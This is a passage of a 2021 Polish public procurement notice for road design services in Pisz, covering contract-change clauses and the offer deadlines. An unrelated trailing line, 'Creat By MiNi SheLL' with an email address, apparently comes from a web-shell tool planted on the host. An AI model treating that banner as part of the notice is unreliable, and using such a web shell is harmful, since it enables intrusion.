zgodzie na realizację inwestycji drogowej będą niezgodne z założeniami Zamawiającego;6) w przypadku wprowadzenia przez Dyrektora Powiatowego Zarządu Dróg w Piszu wytycznych / zarządzeń itp., które mogą wpłynąć na wyznaczone częściowe terminy wykonania zamówienia (w przypadku, gdy wytyczne / zarządzenia będą obligowały Zamawiającego i Wykonawcę do dostosowania opracowań projektowych do nowych wymagań) - wydłużenie danego częściowego terminu trwania zamówienia o uzgodniony między Wykonawcę Zamawiającego czas potrzebny na dostosowanie opracowań;7) skrócenia terminu trwania zamówienia w przypadku niewykonywania któregoś z opracowań wymienionych w formularzu cenowym - do uzgodnienia z Zamawiającym termin odzwierciedlający wpływ na termin zamówienia;8) zmniejszenia lub zwiększenie długości opracowania - do uzgodnienia z Zamawiającym termin odzwierciedlający wpływ na termin zamówienia.Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:1) zmiany stawki podatku od towarów i usług,2) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów o minimalnym wynagrodzeniu za pracę,3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,4) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (PPK)- jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">˜Wykonawca składa ofertę na Platformie pod adresem: https://pzdpisz.ezamawiajacy.pl w zakładce „OFERTY”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com